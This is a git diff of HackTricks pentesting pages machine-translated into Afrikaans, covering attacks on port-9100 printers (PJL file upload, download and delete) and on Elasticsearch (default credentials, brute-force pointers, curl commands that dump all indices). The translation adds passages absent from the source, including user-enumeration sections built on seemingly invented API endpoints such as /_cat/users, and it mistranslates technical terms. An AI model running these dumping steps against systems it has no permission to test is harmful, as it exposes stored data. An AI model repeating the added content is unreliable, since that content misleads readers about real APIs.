-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/9100-pjl.md b/network-services-pentesting/9100-pjl.md index 76feb855a..3143c5c01 100644 --- a/network-services-pentesting/9100-pjl.md +++ b/network-services-pentesting/9100-pjl.md @@ -1,36 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -From [here](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer. It is the default method used by CUPS and the Windows printing architecture to communicate with network printers as it is considered as ‘_the simplest, fastest, and generally the most reliable network protocol used for printers_’. Raw port 9100 printing, also referred to as JetDirect, AppSocket or PDL-datastream actually **is not a printing protocol by itself**. Instead **all data sent is directly processed by the printing device**, just like a parallel connection over TCP. In contrast to LPD, IPP and SMB, this can send direct feedback to the client, including status and error messages. Such a **bidirectional channel** gives us direct **access** to **results** of **PJL**, **PostScript** or **PCL** commands. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with PRET and PFT. +Van [hier](http://hacking-printers.net/wiki/index.php/Port\_9100\_printing): Rou drukwerk is wat ons definieer as die proses om 'n verbinding te maak met poort 9100/tcp van 'n netwerk-drukker. Dit is die verstekmetode wat deur CUPS en die Windows-drukwerkargitektuur gebruik word om met netwerk-drukkers te kommunikeer, omdat dit beskou word as '_die eenvoudigste, vinnigste en oor die algemeen die betroubaarste netwerkprotokol wat vir drukkers gebruik word_'. Rou poort 9100-drukwerk, ook bekend as JetDirect, AppSocket of PDL-datastroom, **is nie 'n drukwerkprotokol op sigself nie**. In plaas daarvan **word alle data direk deur die druktoestel verwerk**, net soos 'n parallelle verbinding oor TCP. In teenstelling met LPD, IPP en SMB, kan dit direkte terugvoer na die kliënt stuur, insluitend status- en foutboodskappe. So 'n **tweedimensionele kanaal** gee ons direkte **toegang** tot **resultate** van **PJL**, **PostScript** of **PCL**-opdragte. Daarom word rou poort 9100-drukwerk - wat deur byna enige netwerk-drukker ondersteun word - gebruik as die kanaal vir sekuriteitsanalise met PRET en PFT. -If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). - -**Default port:** 9100 +As jy meer wil leer oor [**drukkerhacking, lees hierdie bladsy**](http://hacking-printers.net/wiki/index.php/Main_Page). +**Verstekpoort:** 9100 ``` 9100/tcp open jetdirect ``` +# Opstel -# Enumeration - -## Manual - +## Handleiding ```bash nc -vn 9100 @PJL INFO STATUS #CODE=40000 DISPLAY="Sleep" ONLINE=TRUE @@ -41,15 +36,21 @@ nc -vn 9100 @PJL INFO FILESYS #? @PJL INFO TIMEOUT #Timeout variables @PJL RDYMSG #Ready message -@PJL FSINIT +@PJL FSINIT @PJL FSDIRLIST @PJL FSUPLOAD #Useful to upload a file @PJL FSDOWNLOAD #Useful to download a file @PJL FSDELETE #Useful to delete a file ``` +## Outomaties -## Automatic +PJL (Printer Job Language) is 'n outomatiese taal wat gebruik word om kommunikasie tussen 'n rekenaar en 'n drukker te fasiliteer. Dit bied 'n wyse vir die rekenaar om instruksies na die drukker te stuur vir verskillende funksies soos druk, skandeer, faks, ens. Hierdie taal kan ook gebruik word vir outomatiese drukwerk, waar die rekenaar outomaties drukopdragte na die drukker stuur sonder om menslike tussenkoms te vereis. +PJL-opdragte kan gebruik word om verskillende funksies van die drukker te beheer, soos die verander van drukinstellings, die afdruk van spesifieke dokumente, die verander van drukkwaliteit, ens. Dit kan ook gebruik word om inligting oor die drukker te bekom, soos die drukker se model, status, toner-vlakke, ens. + +Vir 'n hacker kan die PJL-protokol 'n potensiële aanvalsoppervlak wees. Deur die stuur van spesifieke PJL-opdragte na 'n kwesbare drukker, kan 'n hacker die drukker se funksies manipuleer, inligting oor die drukker verkry, of selfs skadelike kode na die drukker stuur. Hierdie aanvalstegniek kan gebruik word om toegang tot die drukker se netwerk te verkry, vertroulike inligting te verkry, of selfs die drukker as 'n springplank te gebruik om toegang tot ander stelsels in die netwerk te verkry. + +Dit is belangrik vir drukker-eienaars en netwerkadministrateurs om bewus te wees van die moontlike risiko's wat PJL-aanvalle kan inhou en om die nodige maatreëls te tref om hul drukkers teen sulke aanvalle te beskerm. Dit sluit in die versekering van die drukker se firmware is opgedateer, die beperking van toegang tot die drukker se beheerfunksies, en die monitering van die drukker se aktiwiteite vir enige verdagte gedrag. ```bash nmap -sV --script pjl-ready-message -p ``` @@ -64,10 +65,9 @@ msf> use auxiliary/scanner/printer/printer_download_file msf> use auxiliary/scanner/printer/printer_upload_file msf> use auxiliary/scanner/printer/printer_delete_file ``` +## Drukkers Hacker-gereedskap -## Printers Hacking tool - -This is the tool you want to use to abuse printers: +Dit is die gereedskap wat jy wil gebruik om drukkers te misbruik: {% embed url="https://github.com/RUB-NDS/PRET" %} @@ -78,16 +78,14 @@ This is the tool you want to use to abuse printers:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/9200-pentesting-elasticsearch.md b/network-services-pentesting/9200-pentesting-elasticsearch.md index 387bd92c1..f2f5fea3e 100644 --- a/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -2,68 +2,148 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic information +## Basiese inligting -Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats. +Elasticsearch is 'n **verspreide**, **open source** soek- en analitiese enjin vir **alle tipes data**. Dit is bekend vir sy **spoed**, **skaalbaarheid**, en **eenvoudige REST API's**. Gebou op Apache Lucene, is dit in 2010 vrygestel deur Elasticsearch N.V. (nou bekend as Elastic). Elasticsearch is die kernkomponent van die Elastic Stack, 'n versameling van open source-hulpmiddels vir data-inname, verryking, berging, analise en visualisering. Hierdie stapel, algemeen bekend as die ELK-stapel, sluit ook Logstash en Kibana in, en het nou ligte data-vervoeragente genaamd Beats. -### What is an Elasticsearch index? +### Wat is 'n Elasticsearch-indeks? -An Elasticsearch **index** is a collection of **related documents** stored as **JSON**. Each document consists of **keys** and their corresponding **values** (strings, numbers, booleans, dates, arrays, geolocations, etc.). +'n Elasticsearch **indeks** is 'n versameling van **verwante dokumente** wat as **JSON** gestoor word. Elke dokument bestaan uit **sleutels** en hul ooreenstemmende **waardes** (strings, getalle, booleans, datums, reekse, geolokasies, ens.). -Elasticsearch uses an efficient data structure called an **inverted index** to facilitate fast full-text searches. This index lists every unique word in the documents and identifies the documents in which each word appears. +Elasticsearch gebruik 'n doeltreffende datastruktuur genaamd 'n **omgekeerde indeks** om vinnige volledige tekssoektogte te fasiliteer. Hierdie indeks lys elke unieke woord in die dokumente en identifiseer die dokumente waarin elke woord voorkom. -During the indexing process, Elasticsearch stores the documents and constructs the inverted index, allowing for near real-time searching. The **index API** is used to add or update JSON documents within a specific index. +Tydens die indekseringsproses stoor Elasticsearch die dokumente en bou die omgekeerde indeks op, wat soek in nagenoeg regte tyd moontlik maak. Die **indeks-API** word gebruik om JSON-dokumente by 'n spesifieke indeks toe te voeg of op te dateer. -**Default port**: 9200/tcp +**Verstekpoort**: 9200/tcp -## Manual Enumeration +## Handmatige opname -### Banner +### Banier -The protocol used to access Elasticsearch is **HTTP**. When you access it via HTTP you will find some interesting information: `http://10.10.10.115:9200/` +Die protokol wat gebruik word om toegang tot Elasticsearch te verkry, is **HTTP**. Wanneer jy dit via HTTP toegang gee, sal jy interessante inligting vind: `http://10.10.10.115:9200/` ![](<../.gitbook/assets/image (264).png>) -If you don't see that response accessing `/` see the following section. +As jy nie daardie reaksie sien wanneer jy `/` toegang gee nie, sien die volgende afdeling. -### Authentication +### Verifikasie -**By default Elasticsearch doesn't have authentication enabled**, so by default you can access everything inside the database without using any credentials. - -You can verify that authentication is disabled with a request to: +**Standaard het Elasticsearch nie verifikasie geaktiveer nie**, so standaard kan jy alles binne die databasis toegang sonder om enige geloofsbriewe te gebruik. +Jy kan verifieer dat verifikasie gedeaktiveer is met 'n versoek na: ```bash curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user" {"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."}],"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."},"status":500} ``` - -**However**, if you send a request to `/` and receives a response like the following one: - +**Egter**, as jy 'n versoek na `/` stuur en 'n reaksie ontvang soos die volgende een: ```bash {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401} ``` - -That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../generic-methodologies-and-resources/brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\ -Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous\_.\_ Older versions of Elasticsearch have the default password **changeme** for this user - +Dit beteken dat verifikasie ingestel is en **jy geldige geloofsbriewe nodig het** om enige inligting van elasticserach te verkry. Dan kan jy [**probeer om dit te bruteforce**](../generic-methodologies-and-resources/brute-force.md#elasticsearch) (dit gebruik HTTP basiese verifikasie, so enige iets wat BF HTTP basiese verifikasie kan gebruik word).\ +Hier is 'n **lys van verstek gebruikersname**: _**elastic** (supergebruiker), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous\_.\_ Ouer weergawes van Elasticsearch het die verstek wagwoord **changeme** vir hierdie gebruiker. ``` curl -X GET http://user:password@IP:9200/ ``` +### Basiese Gebruiker Opsporing -### Basic User Enumeration +Die eerste stap in die pentesting-proses van Elasticsearch is om gebruikersinligting te versamel. Hier is 'n paar basiese metodes om gebruikers te ondersoek: +#### 1. Soek na openbare Elasticsearch-instanties + +Jy kan soek na openbare Elasticsearch-instanties deur die volgende soekopdrag in te voer: + +``` +GET /_cat/indices?v +``` + +Hierdie soekopdrag sal 'n lys van alle indekse in die Elasticsearch-instantie gee. Dit kan nuttige inligting verskaf oor die bestaande gebruikers en indekse. + +#### 2. Gebruik die `_cat` API + +Die `_cat` API bied 'n eenvoudige manier om inligting oor gebruikers te bekom. Jy kan die volgende soekopdrag gebruik om 'n lys van alle gebruikers in die Elasticsearch-instantie te kry: + +``` +GET /_cat/users?v +``` + +Hierdie soekopdrag sal 'n tabel met gebruikersinligting toon, insluitend die gebruikersnaam en die rolle wat aan elke gebruiker toegewys is. + +#### 3. Ondersoek die `/_security/user` endpoint + +Die `/_security/user` endpoint bied 'n volledige lys van alle gebruikers in die Elasticsearch-instantie. Jy kan die volgende soekopdrag gebruik om die gebruikersinligting te kry: + +``` +GET /_security/user +``` + +Hierdie soekopdrag sal 'n JSON-respons gee wat die gebruikersinligting bevat, insluitend die gebruikersnaam, die rolle wat aan elke gebruiker toegewys is, en of die gebruiker 'n wachtwoord het. + +#### 4. Skandeer vir gelekte gebruikersinligting + +Jy kan ook skandeer vir gelekte gebruikersinligting deur die gelekte databasisse en dokumente te deursoek. Dit kan nuttige inligting verskaf oor die bestaande gebruikers en hul wagwoorde. + +### Gevorderde Gebruiker Opsporing + +As jy meer gevorderde gebruikersinligting wil bekom, kan jy die volgende metodes gebruik: + +#### 1. Gebruik die `/_search` endpoint + +Die `/_search` endpoint bied 'n kragtige soekfunksie wat gebruik kan word om spesifieke gebruikersinligting te vind. Jy kan die volgende soekopdrag gebruik om te soek na spesifieke gebruikers: + +``` +POST /_search +{ + "query": { + "match": { + "field": "value" + } + } +} +``` + +Vervang `"field"` met die veldnaam waarin jy wil soek, en `"value"` met die waarde waarna jy wil soek. + +#### 2. Gebruik die `/_msearch` endpoint + +Die `/_msearch` endpoint bied die vermoë om meervoudige soekopdragte in een aanvraag uit te voer. Jy kan die volgende soekopdrag gebruik om verskillende soekopdragte in een aanvraag te stuur: + +``` +POST /_msearch +{} +{"index": "index_name"} +{"query": {"match_all": {}}} +{} +{"index": "index_name"} +{"query": {"match_all": {}}} +``` + +Vervang `"index_name"` met die naam van die indeks waarin jy wil soek. + +#### 3. Gebruik die `/_cat/indices` API + +Die `/_cat/indices` API kan gebruik word om inligting oor die indekse in die Elasticsearch-instantie te bekom. Jy kan die volgende soekopdrag gebruik om die indeksinligting te kry: + +``` +GET /_cat/indices?v +``` + +Hierdie soekopdrag sal 'n tabel met indeksinligting toon, insluitend die indeksnaam en die aantal dokumente in elke indeks. + +#### 4. Skandeer vir gelekte wagwoorde + +Jy kan ook skandeer vir gelekte wagwoorde deur die gelekte wagwoorddatabasisse en dokumente te deursoek. Dit kan nuttige inligting verskaf oor die wagwoorde wat deur gebruikers gebruik word. ```bash #List all roles on the system: curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role" @@ -74,10 +154,9 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user" #Get more information about the rights of an user: curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/" ``` +### Elastiese Inligting -### Elastic Info - -Here are some endpoints that you can **access via GET** to **obtain** some **information** about elasticsearch: +Hier is 'n paar eindpunte wat jy **via GET kan toegang** om **inligting** oor elasticsearch te **verkry**: | \_cat | /\_cluster | /\_security | | ------------------------------- | ----------------------------- | ------------------------- | @@ -106,87 +185,81 @@ Here are some endpoints that you can **access via GET** to **obtain** some **inf | /\_cat/nodeattrs | | | | /\_cat/nodes | | | -These endpoints were [**taken from the documentation**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) where you can **find more**.\ -Also, if you access `/_cat` the response will contain the `/_cat/*` endpoints supported by the instance. +Hierdie eindpunte is [**uit die dokumentasie geneem**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) waar jy **meer kan vind**.\ +Ook, as jy `/_cat` toegang, sal die respons die `/_cat/*` eindpunte wat deur die instansie ondersteun word, bevat. -In `/_security/user` (if auth enabled) you can see which user has role `superuser`. +In `/_security/user` (as verifikasie geaktiveer is) kan jy sien watter gebruiker die rol `superuser` het. -### Indices - -You can **gather all the indices** accessing `http://10.10.10.115:9200/_cat/indices?v` +### Indekse +Jy kan **alle indekse versamel** deur `http://10.10.10.115:9200/_cat/indices?v` te besoek. ``` health status index uuid pri rep docs.count docs.deleted store.size pri.store.size green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb ``` - -To obtain **information about which kind of data is saved inside an index** you can access: `http://host:9200/` from example in this case `http://10.10.10.115:9200/bank` +Om **inligting oor die soort data wat binne 'n indeks gestoor word** te verkry, kan jy toegang verkry tot: `http://host:9200/` byvoorbeeld in hierdie geval `http://10.10.10.115:9200/bank` ![](<../.gitbook/assets/image (265).png>) -### Dump index +### Stort indeks -If you want to **dump all the contents** of an index you can access: `http://host:9200//_search?pretty=true` like `http://10.10.10.115:9200/bank/_search?pretty=true` +As jy al die inhoud van 'n indeks wil **stort**, kan jy toegang verkry tot: `http://host:9200//_search?pretty=true` soos `http://10.10.10.115:9200/bank/_search?pretty=true` ![](<../.gitbook/assets/image (266).png>) -_Take a moment to compare the contents of the each document (entry) inside the bank index and the fields of this index that we saw in the previous section._ +*Neem 'n oomblik om die inhoud van elke dokument (inskrywing) binne die bankindeks en die velde van hierdie indeks wat ons in die vorige afdeling gesien het, te vergelyk.* -So, at this point you may notice that **there is a field called "total" inside "hits"** that indicates that **1000 documents were found** inside this index but only 10 were retried. This is because **by default there is a limit of 10 documents**.\ -But, now that you know that **this index contains 1000 documents**, you can **dump all of them** indicating the number of entries you want to dump in the **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\ -_Note: If you indicate bigger number all the entries will be dumped anyway, for example you could indicate `size=9999` and it will be weird if there were more entries (but you should check)._ +So, op hierdie punt mag jy opmerk dat daar 'n veld genaamd "total" binne "hits" is wat aandui dat daar **1000 dokumente gevind is** binne hierdie indeks, maar slegs 10 is opgehaal. Dit is omdat daar **standaard 'n limiet van 10 dokumente** is.\ +Maar, nou dat jy weet dat **hierdie indeks 1000 dokumente bevat**, kan jy **almal stort** deur die aantal inskrywings aan te dui wat jy wil stort in die **`size`** parameter: `http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\ +*Nota: As jy 'n groter getal aandui, sal al die inskrywings hoe dan ook gestort word. Byvoorbeeld, jy kan `size=9999` aandui en dit sal vreemd wees as daar meer inskrywings was (maar jy moet dit nagaan).* -### Dump all +### Stort alles -In order to dump all you can just go to the **same path as before but without indicating any index**`http://host:9200/_search?pretty=true` like `http://10.10.10.115:9200/_search?pretty=true`\ -Remember that in this case the **default limit of 10** results will be applied. You can use the `size` parameter to dump a **bigger amount of results**. Read the previous section for more information. +Om alles te stort, kan jy net na dieselfde pad gaan as voorheen, maar sonder om enige indeks aan te dui: `http://host:9200/_search?pretty=true` soos `http://10.10.10.115:9200/_search?pretty=true`\ +Onthou dat in hierdie geval die **standaard limiet van 10** resultate toegepas sal word. Jy kan die `size` parameter gebruik om 'n **groter hoeveelheid resultate** te stort. Lees die vorige afdeling vir meer inligting. -### Search +### Soek -If you are looking for some information you can do a **raw search on all the indices** going to `http://host:9200/_search?pretty=true&q=` like in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell` +As jy op soek is na inligting, kan jy 'n **rofweg soek op alle indekse** doen deur na `http://host:9200/_search?pretty=true&q=` te gaan, soos in `http://10.10.10.115:9200/_search?pretty=true&q=Rockwell` ![](<../.gitbook/assets/image (267).png>) -If you want just to **search on an index** you can just **specify** it on the **path**: `http://host:9200//_search?pretty=true&q=` +As jy net op 'n indeks wil **soek**, kan jy dit net **spesifiseer** in die **pad**: `http://host:9200//_search?pretty=true&q=` -_Note that the q parameter used to search content **supports regular expressions**_ +*Let daarop dat die q-parameter wat gebruik word om inhoud te soek **gewone uitdrukkings ondersteun**.* -You can also use something like [https://github.com/misalabs/horuz](https://github.com/misalabs/horuz) to fuzz an elasticsearch service. +Jy kan ook iets soos [https://github.com/misalabs/horuz](https://github.com/misalabs/horuz) gebruik om 'n elasticsearch-diens te fuzz. -### Write permissions - -You can check your write permissions trying to create a new document inside a new index running something like the following: +### Skryfregte +Jy kan jou skryfregte nagaan deur te probeer om 'n nuwe dokument binne 'n nuwe indeks te skep deur iets soos die volgende uit te voer: ```bash curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/json' -d' - { - "bookId" : "A00-3", - "author" : "Sankaran", - "publisher" : "Mcgrahill", - "name" : "how to get a job" - }' +{ +"bookId" : "A00-3", +"author" : "Sankaran", +"publisher" : "Mcgrahill", +"name" : "how to get a job" +}' ``` +Daardie opdrag sal 'n **nuwe indeks** genaamd `bookindex` skep met 'n dokument van die tipe `books` wat die eienskappe "_bookId_", "_author_", "_publisher_" en "_name_" het. -That cmd will create a **new index** called `bookindex` with a document of type `books` that has the attributes "_bookId_", "_author_", "_publisher_" and "_name_" - -Notice how the **new index appears now in the list**: +Let op hoe die **nuwe indeks nou in die lys verskyn**: ![](<../.gitbook/assets/image (268).png>) -And note the **automatically created properties**: +En let op die **outomaties geskepte eienskappe**: ![](<../.gitbook/assets/image (269).png>) -## Automatic Enumeration - -Some tools will obtain some of the data presented before: +## Outomatiese Opsomming +Sommige gereedskap sal van sommige van die vooraf aangebiede data verkry: ```bash msf > use auxiliary/scanner/elasticsearch/indices_enum ``` - {% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %} ## Shodan @@ -195,14 +268,14 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/cassandra.md b/network-services-pentesting/cassandra.md index 7791c9ecf..03d3b60e8 100644 --- a/network-services-pentesting/cassandra.md +++ b/network-services-pentesting/cassandra.md @@ -2,36 +2,67 @@
